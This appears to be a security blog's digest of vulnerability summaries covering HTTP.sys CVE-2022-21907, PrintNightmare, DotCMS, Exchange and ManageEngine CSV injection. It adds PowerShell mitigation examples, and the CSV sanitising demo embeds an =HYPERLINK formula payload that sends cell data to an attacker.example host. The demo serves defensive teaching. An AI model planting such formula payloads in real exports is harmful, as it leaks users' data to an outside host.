Common Vulnerabilities and Exposures

CVE-2022-21907: HTTP Protocol Stack Remote Code Execution Vulnerability Description: The vulnerability is in HTTP.sys, the kernel-mode HTTP protocol stack that IIS runs on. The exploit works by spraying an IIS server with several large GET requests and finishing with a malformed HTTP request. Mitigation: Windows Server 2019 and Windows 10 version 1809 are not vulnerable by default. Unless you have enabled HTTP Trailer Support via the EnableTrailerSupport registry value, […]
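The registry check implied by that mitigation, as an added example (PowerShell written for this page, not code from the original post): it reports whether the EnableTrailerSupport opt-in is present and non-zero on the host and removes it. The registry path and value name are the ones Microsoft's advisory for CVE-2022-21907 names; they do not appear on this page.

```powershell
# Added example (not from the original post). Checks the HTTP.sys trailer-support
# opt-in that turns a default-safe Server 2019 / Windows 10 1809 host into an
# exposed one for CVE-2022-21907, and removes it. Path and value name are taken
# from Microsoft's advisory for this CVE.
$HttpParamsKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\HTTP\Parameters'

function Get-HttpTrailerSupportState {
    # Reading HKLM needs no elevation. A missing key or value is the default
    # state, so both are reported as "not exposed" rather than as an error.
    $item = Get-ItemProperty -Path $HttpParamsKey -Name 'EnableTrailerSupport' -ErrorAction SilentlyContinue
    if ($null -eq $item) {
        return [pscustomobject]@{ Present = $false; Value = $null; Exposed = $false }
    }
    $v = [int]$item.EnableTrailerSupport
    return [pscustomobject]@{ Present = $true; Value = $v; Exposed = ($v -ne 0) }
}

function Disable-HttpTrailerSupport {
    # Deleting the value restores the default (trailer support off). Requires an
    # elevated session; the HTTP service (and therefore IIS) must be restarted
    # for the change to take effect, so schedule it like any other outage.
    Remove-ItemProperty -Path $HttpParamsKey -Name 'EnableTrailerSupport' -ErrorAction SilentlyContinue
}

$state = Get-HttpTrailerSupportState
if ($state.Exposed) {
    Write-Warning "EnableTrailerSupport=$($state.Value): host is exposed to CVE-2022-21907 until patched or the value is removed."
    Disable-HttpTrailerSupport
} else {
    Write-Output 'EnableTrailerSupport absent or 0: default (not exposed) configuration for Server 2019 / Windows 10 1809.'
}
```

The opt-in only matters on Windows Server 2019 and Windows 10 version 1809. Later builds (Windows Server 2022, Windows 10 20H2 and newer, Windows 11) are listed as affected regardless of this value, so on those hosts the January 2022 security update is the only fix; the registry check is a stop-gap for the two older builds, not a substitute for patching.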

Common Vulnerabilities & Exposures June 2021

Vulnerability 1: D-Link Insufficient Credential Protection (7.2 High) Description: D-Link is affected by a credential exposure vulnerability. Credential exposure lets an attacker read stored credentials without any hindrance at all, granting them access to critical systems. In the case of D-Link, credentials are insufficiently protected in D-Link DIR-2640-US 1.01B04 and in D-Link AC2600 (DIR-2640), credentials […]

Common Vulnerabilities & Exposures May 2021

Vulnerability 1: UPDATED Microsoft Exchange Server RCE (9.8 Critical) Description: Microsoft Exchange Server has a new remote code execution (RCE) vulnerability. RCEs allow an attacker to execute code on a computer, for example via a file sent by email or delivered on a USB drive which, when downloaded, can deploy […]

Common Vulnerabilities & Exposures

Vulnerability 1: DotCMS Remote Code Execution Vulnerability (10.0 Critical) Description: A Remote Code Execution (RCE) vulnerability exists in DotCMS v5.2.3. In an RCE attack the attacker runs code of their choosing on the target from a remote location, without any physical access to the compromised device. In DotCMS' case, an attacker can send a specially crafted HTTP POST request through the […]

Common Vulnerabilities & Exposures

Vulnerability 1: PrintNightmare Windows Spooler Service (9.0 Critical) Description: The Windows Print Spooler Service (WSS) holds a Remote Code Execution vulnerability. The WSS implements the print roles for clients and servers, enabling each connected system to act as a print client, administrative client or print server for printer services. A remote code execution (RCE) […]

Common Vulnerabilities and Exposures August 2021

Vulnerability 1: ManageEngine ADSelfService Plus CSV Injection Vulnerability (9.3 Critical) Description: A CSV injection vulnerability lies within the ManageEngine ADSelfService Plus system. In a CSV injection attack, the attacker exploits missing or improper input validation in a website or web application to plant a value beginning with a formula character (such as =, +, - or @) in data that is later exported as CSV; when a user opens that export in a spreadsheet application, the cell is evaluated as a formula and can run applications and code on the user's machine. These types of attacks can be exploited […]
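The export path described above, as an added example (PowerShell written for this page, not ADSelfService Plus code or code from the original post): constructed user records, one of which carries a formula in its display name, are exported unsafely and then through a cell sanitiser. The payload, the field names and the file names are all made up for the illustration.

```powershell
# Added example (not from the original post). Shows why a CSV export is
# injectable and one standard mitigation: neutralising cells that a spreadsheet
# would otherwise treat as formulas. Sample data below is constructed.
function Protect-CsvCell {
    param([AllowNull()][string]$Value)
    if ([string]::IsNullOrEmpty($Value)) { return $Value }
    # Excel and LibreOffice evaluate a cell that starts with = + - or @ as a
    # formula; a leading tab or carriage return is a known way to sneak past
    # checks that only look at the first printable character. Quoting the field
    # does NOT help, so prefix the cell with an apostrophe to force text.
    if ($Value -match '^[=+\-@\t\r]') {
        return "'" + $Value
    }
    return $Value
}

function Get-SanitisedRecords {
    param([object[]]$Records)
    foreach ($r in $Records) {
        $o = [ordered]@{}
        foreach ($p in $r.PSObject.Properties) { $o[$p.Name] = Protect-CsvCell $p.Value }
        [pscustomobject]$o
    }
}

# Constructed sample "user" records, as a self-service portal might export them.
# The second DisplayName is attacker-controlled and leaks the neighbouring cell
# to a hypothetical attacker.example host when the link is clicked.
$users = @(
    [pscustomobject]@{ SamAccountName = 'jdoe';    DisplayName = 'John Doe' },
    [pscustomobject]@{ SamAccountName = 'mallory'; DisplayName = '=HYPERLINK("http://attacker.example/?"&A2,"click me")' }
)

# Unsafe export: the formula survives Export-Csv's quoting and goes live when opened.
$users | Export-Csv -Path .\unsafe.csv -NoTypeInformation

# Hardened export: every string property passes through Protect-CsvCell first.
Get-SanitisedRecords -Records $users | Export-Csv -Path .\safe.csv -NoTypeInformation
```

The apostrophe prefix is the usual server-side fix because it works in the common spreadsheet applications, but it changes the data: a legitimate negative number such as -5 becomes the text '-5. Exports consumed by other programs rather than by people should use a stricter allow-list on the fields that accept user input instead, and report generators should do this at the point of export rather than trusting that the value was validated on the way in.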

Common Vulnerabilities and Exposures – October 2022

Critical Zoho ManageEngine RCE Vulnerability On 22 September 2022, the US Cybersecurity and Infrastructure Security Agency (CISA) added a critical unauthenticated Remote Code Execution (RCE) vulnerability affecting Zoho ManageEngine products to its Known Exploited Vulnerabilities catalog. The vulnerability has a CVSS score of 9.8 and stems from a Java deserialisation flaw that allows an unauthenticated […]